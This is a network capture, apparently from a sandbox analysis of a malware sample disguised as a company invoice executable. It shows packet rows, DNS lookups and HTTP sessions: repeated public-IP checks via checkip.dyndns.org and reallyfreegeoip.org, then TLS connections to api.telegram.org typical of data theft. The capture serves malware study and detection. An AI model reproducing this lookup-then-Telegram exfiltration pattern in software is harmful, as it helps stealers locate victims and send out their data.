                                        Aug 29, 2024 12:16:29.339098930 CEST49725443192.168.2.10188.114.97.3
                                        Aug 29, 2024 12:16:29.395004988 CEST4972880192.168.2.10193.122.6.168
                                        Aug 29, 2024 12:16:29.399796963 CEST8049728193.122.6.168192.168.2.10
                                        Aug 29, 2024 12:16:29.399854898 CEST4972880192.168.2.10193.122.6.168
                                        Aug 29, 2024 12:16:29.403533936 CEST4972880192.168.2.10193.122.6.168
                                        Aug 29, 2024 12:16:29.408620119 CEST8049728193.122.6.168192.168.2.10
                                        Aug 29, 2024 12:16:29.465807915 CEST44349726188.114.97.3192.168.2.10
                                        Aug 29, 2024 12:16:29.465912104 CEST44349726188.114.97.3192.168.2.10
                                        Aug 29, 2024 12:16:29.465958118 CEST49726443192.168.2.10188.114.97.3
                                        Aug 29, 2024 12:16:29.466768980 CEST49726443192.168.2.10188.114.97.3
                                        Aug 29, 2024 12:16:29.470474958 CEST4972280192.168.2.10193.122.6.168
                                        Aug 29, 2024 12:16:29.471580029 CEST4972980192.168.2.10193.122.6.168
                                        Aug 29, 2024 12:16:29.475775957 CEST8049722193.122.6.168192.168.2.10
                                        Aug 29, 2024 12:16:29.475831985 CEST4972280192.168.2.10193.122.6.168
                                        Aug 29, 2024 12:16:29.476392031 CEST8049729193.122.6.168192.168.2.10
                                        Aug 29, 2024 12:16:29.476459026 CEST4972980192.168.2.10193.122.6.168
                                        Aug 29, 2024 12:16:29.476536036 CEST4972980192.168.2.10193.122.6.168
                                        Aug 29, 2024 12:16:29.481276035 CEST8049729193.122.6.168192.168.2.10
                                        Aug 29, 2024 12:16:30.101130962 CEST8049729193.122.6.168192.168.2.10
                                        Aug 29, 2024 12:16:30.102335930 CEST49730443192.168.2.10188.114.97.3
                                        Aug 29, 2024 12:16:30.102375031 CEST44349730188.114.97.3192.168.2.10
                                        Aug 29, 2024 12:16:30.102446079 CEST49730443192.168.2.10188.114.97.3
                                        Aug 29, 2024 12:16:30.102710009 CEST49730443192.168.2.10188.114.97.3
                                        Aug 29, 2024 12:16:30.102725983 CEST44349730188.114.97.3192.168.2.10
                                        Aug 29, 2024 12:16:30.152030945 CEST4972980192.168.2.10193.122.6.168
                                        Aug 29, 2024 12:16:30.573098898 CEST44349730188.114.97.3192.168.2.10
                                        Aug 29, 2024 12:16:30.575022936 CEST49730443192.168.2.10188.114.97.3
                                        Aug 29, 2024 12:16:30.575043917 CEST44349730188.114.97.3192.168.2.10
                                        Aug 29, 2024 12:16:30.721493959 CEST44349730188.114.97.3192.168.2.10
                                        Aug 29, 2024 12:16:30.721601963 CEST44349730188.114.97.3192.168.2.10
                                        Aug 29, 2024 12:16:30.721766949 CEST49730443192.168.2.10188.114.97.3
                                        Aug 29, 2024 12:16:30.722076893 CEST49730443192.168.2.10188.114.97.3
                                        Aug 29, 2024 12:16:30.725965023 CEST4972980192.168.2.10193.122.6.168
                                        Aug 29, 2024 12:16:30.727116108 CEST4973480192.168.2.10193.122.6.168
                                        Aug 29, 2024 12:16:30.731148005 CEST8049729193.122.6.168192.168.2.10
                                        Aug 29, 2024 12:16:30.731235981 CEST4972980192.168.2.10193.122.6.168
                                        Aug 29, 2024 12:16:30.731956005 CEST8049734193.122.6.168192.168.2.10
                                        Aug 29, 2024 12:16:30.732039928 CEST4973480192.168.2.10193.122.6.168
                                        Aug 29, 2024 12:16:30.732157946 CEST4973480192.168.2.10193.122.6.168
                                        Aug 29, 2024 12:16:30.736934900 CEST8049734193.122.6.168192.168.2.10
                                        Aug 29, 2024 12:16:31.033838034 CEST8049728193.122.6.168192.168.2.10
                                        Aug 29, 2024 12:16:31.035576105 CEST49735443192.168.2.10188.114.97.3
                                        Aug 29, 2024 12:16:31.035623074 CEST44349735188.114.97.3192.168.2.10
                                        Aug 29, 2024 12:16:31.035690069 CEST49735443192.168.2.10188.114.97.3
                                        Aug 29, 2024 12:16:31.036006927 CEST49735443192.168.2.10188.114.97.3
                                        Aug 29, 2024 12:16:31.036022902 CEST44349735188.114.97.3192.168.2.10
                                        Aug 29, 2024 12:16:31.073915005 CEST4972880192.168.2.10193.122.6.168
                                        Aug 29, 2024 12:16:31.357146978 CEST8049734193.122.6.168192.168.2.10
                                        Aug 29, 2024 12:16:31.358464956 CEST49736443192.168.2.10188.114.97.3
                                        Aug 29, 2024 12:16:31.358505964 CEST44349736188.114.97.3192.168.2.10
                                        Aug 29, 2024 12:16:31.358592987 CEST49736443192.168.2.10188.114.97.3
                                        Aug 29, 2024 12:16:31.358859062 CEST49736443192.168.2.10188.114.97.3
                                        Aug 29, 2024 12:16:31.358872890 CEST44349736188.114.97.3192.168.2.10
                                        Aug 29, 2024 12:16:31.402076006 CEST4973480192.168.2.10193.122.6.168
                                        Aug 29, 2024 12:16:31.493491888 CEST44349735188.114.97.3192.168.2.10
                                        Aug 29, 2024 12:16:31.524368048 CEST49735443192.168.2.10188.114.97.3
                                        Aug 29, 2024 12:16:31.524393082 CEST44349735188.114.97.3192.168.2.10
                                        Aug 29, 2024 12:16:31.647921085 CEST44349735188.114.97.3192.168.2.10
                                        Aug 29, 2024 12:16:31.648024082 CEST44349735188.114.97.3192.168.2.10
                                        Aug 29, 2024 12:16:31.648184061 CEST49735443192.168.2.10188.114.97.3
                                        Aug 29, 2024 12:16:31.648883104 CEST49735443192.168.2.10188.114.97.3
                                        Aug 29, 2024 12:16:31.654042959 CEST4972880192.168.2.10193.122.6.168
                                        Aug 29, 2024 12:16:31.655325890 CEST4973780192.168.2.10193.122.6.168
                                        Aug 29, 2024 12:16:31.661077976 CEST8049728193.122.6.168192.168.2.10
                                        Aug 29, 2024 12:16:31.661334991 CEST4972880192.168.2.10193.122.6.168
                                        Aug 29, 2024 12:16:31.662053108 CEST8049737193.122.6.168192.168.2.10
                                        Aug 29, 2024 12:16:31.662120104 CEST4973780192.168.2.10193.122.6.168
                                        Aug 29, 2024 12:16:31.662296057 CEST4973780192.168.2.10193.122.6.168
                                        Aug 29, 2024 12:16:31.668833017 CEST8049737193.122.6.168192.168.2.10
                                        Aug 29, 2024 12:16:31.834739923 CEST44349736188.114.97.3192.168.2.10
                                        Aug 29, 2024 12:16:31.845524073 CEST49736443192.168.2.10188.114.97.3
                                        Aug 29, 2024 12:16:31.845541000 CEST44349736188.114.97.3192.168.2.10
                                        Aug 29, 2024 12:16:31.967895985 CEST44349736188.114.97.3192.168.2.10
                                        Aug 29, 2024 12:16:31.967999935 CEST44349736188.114.97.3192.168.2.10
                                        Aug 29, 2024 12:16:31.968055010 CEST49736443192.168.2.10188.114.97.3
                                        Aug 29, 2024 12:16:31.968539953 CEST49736443192.168.2.10188.114.97.3
                                        Aug 29, 2024 12:16:31.972305059 CEST4973480192.168.2.10193.122.6.168
                                        Aug 29, 2024 12:16:31.973545074 CEST4973880192.168.2.10193.122.6.168
                                        Aug 29, 2024 12:16:31.979487896 CEST8049734193.122.6.168192.168.2.10
                                        Aug 29, 2024 12:16:31.979551077 CEST4973480192.168.2.10193.122.6.168
                                        Aug 29, 2024 12:16:31.980361938 CEST8049738193.122.6.168192.168.2.10
                                        Aug 29, 2024 12:16:31.980427027 CEST4973880192.168.2.10193.122.6.168
                                        Aug 29, 2024 12:16:31.980546951 CEST4973880192.168.2.10193.122.6.168
                                        Aug 29, 2024 12:16:31.987464905 CEST8049738193.122.6.168192.168.2.10
                                        Aug 29, 2024 12:16:32.549835920 CEST8049737193.122.6.168192.168.2.10
                                        Aug 29, 2024 12:16:32.551234961 CEST49739443192.168.2.10188.114.97.3
                                        Aug 29, 2024 12:16:32.551274061 CEST44349739188.114.97.3192.168.2.10
                                        Aug 29, 2024 12:16:32.551335096 CEST49739443192.168.2.10188.114.97.3
                                        Aug 29, 2024 12:16:32.551637888 CEST49739443192.168.2.10188.114.97.3
                                        Aug 29, 2024 12:16:32.551656008 CEST44349739188.114.97.3192.168.2.10
                                        Aug 29, 2024 12:16:32.589548111 CEST4973780192.168.2.10193.122.6.168
                                        Aug 29, 2024 12:16:32.630202055 CEST8049738193.122.6.168192.168.2.10
                                        Aug 29, 2024 12:16:32.631449938 CEST49740443192.168.2.10188.114.97.3
                                        Aug 29, 2024 12:16:32.631481886 CEST44349740188.114.97.3192.168.2.10
                                        Aug 29, 2024 12:16:32.631629944 CEST49740443192.168.2.10188.114.97.3
                                        Aug 29, 2024 12:16:32.631870031 CEST49740443192.168.2.10188.114.97.3
                                        Aug 29, 2024 12:16:32.631890059 CEST44349740188.114.97.3192.168.2.10
                                        Aug 29, 2024 12:16:32.683288097 CEST4973880192.168.2.10193.122.6.168
                                        Aug 29, 2024 12:16:33.026663065 CEST44349739188.114.97.3192.168.2.10
                                        Aug 29, 2024 12:16:33.028635025 CEST49739443192.168.2.10188.114.97.3
                                        Aug 29, 2024 12:16:33.028676987 CEST44349739188.114.97.3192.168.2.10
                                        Aug 29, 2024 12:16:33.091042995 CEST44349740188.114.97.3192.168.2.10
                                        Aug 29, 2024 12:16:33.095571041 CEST49740443192.168.2.10188.114.97.3
                                        Aug 29, 2024 12:16:33.095612049 CEST44349740188.114.97.3192.168.2.10
                                        Aug 29, 2024 12:16:33.178426027 CEST44349739188.114.97.3192.168.2.10
                                        Aug 29, 2024 12:16:33.178519964 CEST44349739188.114.97.3192.168.2.10
                                        Aug 29, 2024 12:16:33.178585052 CEST49739443192.168.2.10188.114.97.3
                                        Aug 29, 2024 12:16:33.179316044 CEST49739443192.168.2.10188.114.97.3
                                        Aug 29, 2024 12:16:33.182892084 CEST4973780192.168.2.10193.122.6.168
                                        Aug 29, 2024 12:16:33.184288025 CEST4974180192.168.2.10193.122.6.168
                                        Aug 29, 2024 12:16:33.188196898 CEST8049737193.122.6.168192.168.2.10
                                        Aug 29, 2024 12:16:33.188988924 CEST4973780192.168.2.10193.122.6.168
                                        Aug 29, 2024 12:16:33.189222097 CEST8049741193.122.6.168192.168.2.10
                                        Aug 29, 2024 12:16:33.189291954 CEST4974180192.168.2.10193.122.6.168
                                        Aug 29, 2024 12:16:33.189429998 CEST4974180192.168.2.10193.122.6.168
                                        Aug 29, 2024 12:16:33.194206953 CEST8049741193.122.6.168192.168.2.10
                                        Aug 29, 2024 12:16:33.238720894 CEST44349740188.114.97.3192.168.2.10
                                        Aug 29, 2024 12:16:33.238820076 CEST44349740188.114.97.3192.168.2.10
                                        Aug 29, 2024 12:16:33.239218950 CEST49740443192.168.2.10188.114.97.3
                                        Aug 29, 2024 12:16:33.239603043 CEST49740443192.168.2.10188.114.97.3
                                        Aug 29, 2024 12:16:33.288820982 CEST4973880192.168.2.10193.122.6.168
                                        Aug 29, 2024 12:16:33.295062065 CEST8049738193.122.6.168192.168.2.10
                                        Aug 29, 2024 12:16:33.295950890 CEST4973880192.168.2.10193.122.6.168
                                        Aug 29, 2024 12:16:33.299570084 CEST49742443192.168.2.10149.154.167.220
                                        Aug 29, 2024 12:16:33.299614906 CEST44349742149.154.167.220192.168.2.10
                                        Aug 29, 2024 12:16:33.299690962 CEST49742443192.168.2.10149.154.167.220
                                        Aug 29, 2024 12:16:33.300173998 CEST49742443192.168.2.10149.154.167.220
                                        Aug 29, 2024 12:16:33.300185919 CEST44349742149.154.167.220192.168.2.10
                                        Aug 29, 2024 12:16:33.834775925 CEST8049741193.122.6.168192.168.2.10
                                        Aug 29, 2024 12:16:33.836520910 CEST49743443192.168.2.10188.114.97.3
                                        Aug 29, 2024 12:16:33.836570024 CEST44349743188.114.97.3192.168.2.10
                                        Aug 29, 2024 12:16:33.836697102 CEST49743443192.168.2.10188.114.97.3
                                        Aug 29, 2024 12:16:33.836960077 CEST49743443192.168.2.10188.114.97.3
                                        Aug 29, 2024 12:16:33.836977005 CEST44349743188.114.97.3192.168.2.10
                                        Aug 29, 2024 12:16:33.886452913 CEST4974180192.168.2.10193.122.6.168
                                        Aug 29, 2024 12:16:33.911503077 CEST44349742149.154.167.220192.168.2.10
                                        Aug 29, 2024 12:16:33.911629915 CEST49742443192.168.2.10149.154.167.220
                                        Aug 29, 2024 12:16:33.914753914 CEST49742443192.168.2.10149.154.167.220
                                        Aug 29, 2024 12:16:33.914766073 CEST44349742149.154.167.220192.168.2.10
                                        Aug 29, 2024 12:16:33.915003061 CEST44349742149.154.167.220192.168.2.10
                                        Aug 29, 2024 12:16:33.920099974 CEST49742443192.168.2.10149.154.167.220
                                        Aug 29, 2024 12:16:33.960508108 CEST44349742149.154.167.220192.168.2.10
                                        Aug 29, 2024 12:16:34.154836893 CEST44349742149.154.167.220192.168.2.10
                                        Aug 29, 2024 12:16:34.154932976 CEST44349742149.154.167.220192.168.2.10
                                        Aug 29, 2024 12:16:34.154993057 CEST49742443192.168.2.10149.154.167.220
                                        Aug 29, 2024 12:16:34.157311916 CEST49742443192.168.2.10149.154.167.220
                                        Aug 29, 2024 12:16:34.320194960 CEST44349743188.114.97.3192.168.2.10
                                        Aug 29, 2024 12:16:34.322298050 CEST49743443192.168.2.10188.114.97.3
                                        Aug 29, 2024 12:16:34.322331905 CEST44349743188.114.97.3192.168.2.10
                                        Aug 29, 2024 12:16:34.451102018 CEST44349743188.114.97.3192.168.2.10
                                        Aug 29, 2024 12:16:34.451231003 CEST44349743188.114.97.3192.168.2.10
                                        Aug 29, 2024 12:16:34.451281071 CEST49743443192.168.2.10188.114.97.3
                                        Aug 29, 2024 12:16:34.451724052 CEST49743443192.168.2.10188.114.97.3
                                        Aug 29, 2024 12:16:34.454452991 CEST4974180192.168.2.10193.122.6.168
                                        Aug 29, 2024 12:16:34.455780983 CEST4974480192.168.2.10193.122.6.168
                                        Aug 29, 2024 12:16:34.460506916 CEST8049741193.122.6.168192.168.2.10
                                        Aug 29, 2024 12:16:34.460581064 CEST4974180192.168.2.10193.122.6.168
                                        Aug 29, 2024 12:16:34.461505890 CEST8049744193.122.6.168192.168.2.10
                                        Aug 29, 2024 12:16:34.461575031 CEST4974480192.168.2.10193.122.6.168
                                        Aug 29, 2024 12:16:34.461662054 CEST4974480192.168.2.10193.122.6.168
                                        Aug 29, 2024 12:16:34.466646910 CEST8049744193.122.6.168192.168.2.10
                                        Aug 29, 2024 12:16:35.112150908 CEST8049744193.122.6.168192.168.2.10
                                        Aug 29, 2024 12:16:35.113691092 CEST49745443192.168.2.10188.114.97.3
                                        Aug 29, 2024 12:16:35.113730907 CEST44349745188.114.97.3192.168.2.10
                                        Aug 29, 2024 12:16:35.113826990 CEST49745443192.168.2.10188.114.97.3
                                        Aug 29, 2024 12:16:35.114101887 CEST49745443192.168.2.10188.114.97.3
                                        Aug 29, 2024 12:16:35.114115953 CEST44349745188.114.97.3192.168.2.10
                                        Aug 29, 2024 12:16:35.167762995 CEST4974480192.168.2.10193.122.6.168
                                        Aug 29, 2024 12:16:35.585953951 CEST44349745188.114.97.3192.168.2.10
                                        Aug 29, 2024 12:16:35.587938070 CEST49745443192.168.2.10188.114.97.3
                                        Aug 29, 2024 12:16:35.587969065 CEST44349745188.114.97.3192.168.2.10
                                        Aug 29, 2024 12:16:35.726295948 CEST44349745188.114.97.3192.168.2.10
                                        Aug 29, 2024 12:16:35.726404905 CEST44349745188.114.97.3192.168.2.10
                                        Aug 29, 2024 12:16:35.726474047 CEST49745443192.168.2.10188.114.97.3
                                        Aug 29, 2024 12:16:35.726936102 CEST49745443192.168.2.10188.114.97.3
                                        Aug 29, 2024 12:16:35.734771013 CEST4974480192.168.2.10193.122.6.168
                                        Aug 29, 2024 12:16:35.735584974 CEST49746443192.168.2.10149.154.167.220
                                        Aug 29, 2024 12:16:35.735629082 CEST44349746149.154.167.220192.168.2.10
                                        Aug 29, 2024 12:16:35.735752106 CEST49746443192.168.2.10149.154.167.220
                                        Aug 29, 2024 12:16:35.736170053 CEST49746443192.168.2.10149.154.167.220
                                        Aug 29, 2024 12:16:35.736181021 CEST44349746149.154.167.220192.168.2.10
                                        Aug 29, 2024 12:16:35.740350962 CEST8049744193.122.6.168192.168.2.10
                                        Aug 29, 2024 12:16:35.740427971 CEST4974480192.168.2.10193.122.6.168
                                        Aug 29, 2024 12:16:36.343456030 CEST44349746149.154.167.220192.168.2.10
                                        Aug 29, 2024 12:16:36.343576908 CEST49746443192.168.2.10149.154.167.220
                                        Aug 29, 2024 12:16:36.345061064 CEST49746443192.168.2.10149.154.167.220
                                        Aug 29, 2024 12:16:36.345072985 CEST44349746149.154.167.220192.168.2.10
                                        Aug 29, 2024 12:16:36.345300913 CEST44349746149.154.167.220192.168.2.10
                                        Aug 29, 2024 12:16:36.346755028 CEST49746443192.168.2.10149.154.167.220
                                        Aug 29, 2024 12:16:36.388518095 CEST44349746149.154.167.220192.168.2.10
                                        Aug 29, 2024 12:16:36.589821100 CEST44349746149.154.167.220192.168.2.10
                                        Aug 29, 2024 12:16:36.589910984 CEST44349746149.154.167.220192.168.2.10
                                        Aug 29, 2024 12:16:36.589983940 CEST49746443192.168.2.10149.154.167.220
                                        Aug 29, 2024 12:16:36.590548038 CEST49746443192.168.2.10149.154.167.220
                                        Aug 29, 2024 12:16:39.374872923 CEST4971280192.168.2.10193.122.6.168
                                        Aug 29, 2024 12:16:41.799983025 CEST4972380192.168.2.10193.122.6.168
                                        TimestampSource PortDest PortSource IPDest IP
                                        Aug 29, 2024 12:16:15.243599892 CEST6140853192.168.2.101.1.1.1
                                        Aug 29, 2024 12:16:15.250833035 CEST53614081.1.1.1192.168.2.10
                                        Aug 29, 2024 12:16:16.748799086 CEST5035053192.168.2.101.1.1.1
                                        Aug 29, 2024 12:16:16.756159067 CEST53503501.1.1.1192.168.2.10
                                        Aug 29, 2024 12:16:33.289601088 CEST4996253192.168.2.101.1.1.1
                                        Aug 29, 2024 12:16:33.298933029 CEST53499621.1.1.1192.168.2.10
                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                        Aug 29, 2024 12:16:15.243599892 CEST192.168.2.101.1.1.10x3188Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                        Aug 29, 2024 12:16:16.748799086 CEST192.168.2.101.1.1.10xe423Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                        Aug 29, 2024 12:16:33.289601088 CEST192.168.2.101.1.1.10xe0ffStandard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                        Aug 29, 2024 12:16:15.250833035 CEST1.1.1.1192.168.2.100x3188No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                        Aug 29, 2024 12:16:15.250833035 CEST1.1.1.1192.168.2.100x3188No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                        Aug 29, 2024 12:16:15.250833035 CEST1.1.1.1192.168.2.100x3188No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                        Aug 29, 2024 12:16:15.250833035 CEST1.1.1.1192.168.2.100x3188No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                        Aug 29, 2024 12:16:15.250833035 CEST1.1.1.1192.168.2.100x3188No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                        Aug 29, 2024 12:16:15.250833035 CEST1.1.1.1192.168.2.100x3188No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                        Aug 29, 2024 12:16:16.756159067 CEST1.1.1.1192.168.2.100xe423No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                        Aug 29, 2024 12:16:16.756159067 CEST1.1.1.1192.168.2.100xe423No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                        Aug 29, 2024 12:16:33.298933029 CEST1.1.1.1192.168.2.100xe0ffNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                        • reallyfreegeoip.org
                                        • api.telegram.org
                                        • checkip.dyndns.org
                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        0192.168.2.1049706193.122.6.168804820C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe
                                        TimestampBytes transferredDirectionData
                                        Aug 29, 2024 12:16:15.272239923 CEST151OUTGET / HTTP/1.1
                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                        Host: checkip.dyndns.org
                                        Connection: Keep-Alive
                                        Aug 29, 2024 12:16:16.159588099 CEST320INHTTP/1.1 200 OK
                                        Date: Thu, 29 Aug 2024 10:16:16 GMT
                                        Content-Type: text/html
                                        Content-Length: 103
                                        Connection: keep-alive
                                        Cache-Control: no-cache
                                        Pragma: no-cache
                                        X-Request-ID: 0c3df42ddfa66df7b6b1c3bcf5ae355f
                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                        Aug 29, 2024 12:16:16.165649891 CEST127OUTGET / HTTP/1.1
                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                        Host: checkip.dyndns.org
                                        Aug 29, 2024 12:16:16.679012060 CEST320INHTTP/1.1 200 OK
                                        Date: Thu, 29 Aug 2024 10:16:16 GMT
                                        Content-Type: text/html
                                        Content-Length: 103
                                        Connection: keep-alive
                                        Cache-Control: no-cache
                                        Pragma: no-cache
                                        X-Request-ID: 93f8c8aa79c79cd4487802d4a10ab790
                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                        Aug 29, 2024 12:16:17.495058060 CEST127OUTGET / HTTP/1.1
                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                        Host: checkip.dyndns.org
                                        Aug 29, 2024 12:16:18.118598938 CEST320INHTTP/1.1 200 OK
                                        Date: Thu, 29 Aug 2024 10:16:18 GMT
                                        Content-Type: text/html
                                        Content-Length: 103
                                        Connection: keep-alive
                                        Cache-Control: no-cache
                                        Pragma: no-cache
                                        X-Request-ID: abf6e85b6af43269d4ca1b720b502d9d
                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        1192.168.2.1049711193.122.6.168804268C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe
                                        TimestampBytes transferredDirectionData
                                        Aug 29, 2024 12:16:18.560513020 CEST151OUTGET / HTTP/1.1
                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                        Host: checkip.dyndns.org
                                        Connection: Keep-Alive
                                        Aug 29, 2024 12:16:20.466684103 CEST320INHTTP/1.1 200 OK
                                        Date: Thu, 29 Aug 2024 10:16:20 GMT
                                        Content-Type: text/html
                                        Content-Length: 103
                                        Connection: keep-alive
                                        Cache-Control: no-cache
                                        Pragma: no-cache
                                        X-Request-ID: fe8f6acb9d67ef00ff0e1bf2cc60b849
                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                        Aug 29, 2024 12:16:20.489833117 CEST127OUTGET / HTTP/1.1
                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                        Host: checkip.dyndns.org
                                        Aug 29, 2024 12:16:22.815336943 CEST730INHTTP/1.1 502 Bad Gateway
                                        Date: Thu, 29 Aug 2024 10:16:22 GMT
                                        Content-Type: text/html
                                        Content-Length: 547
                                        Connection: keep-alive
                                        X-Request-ID: 966cf5caac292e74ae7fec02e54a00cf
                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 [TRUNCATED]
                                        Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><center><h1>502 Bad Gateway</h1></center><hr><center></center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                        Aug 29, 2024 12:16:22.828527927 CEST127OUTGET / HTTP/1.1
                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                        Host: checkip.dyndns.org
                                        Aug 29, 2024 12:16:24.217804909 CEST320INHTTP/1.1 200 OK
                                        Date: Thu, 29 Aug 2024 10:16:24 GMT
                                        Content-Type: text/html
                                        Content-Length: 103
                                        Connection: keep-alive
                                        Cache-Control: no-cache
                                        Pragma: no-cache
                                        X-Request-ID: f6f790d5bd056b5b568526aa2c61b09e
                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                        Aug 29, 2024 12:16:24.891705990 CEST127OUTGET / HTTP/1.1
                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                        Host: checkip.dyndns.org
                                        Aug 29, 2024 12:16:25.077893972 CEST320INHTTP/1.1 200 OK
                                        Date: Thu, 29 Aug 2024 10:16:24 GMT
                                        Content-Type: text/html
                                        Content-Length: 103
                                        Connection: keep-alive
                                        Cache-Control: no-cache
                                        Pragma: no-cache
                                        X-Request-ID: ee56d457e41ff5196e9affc01d78f312
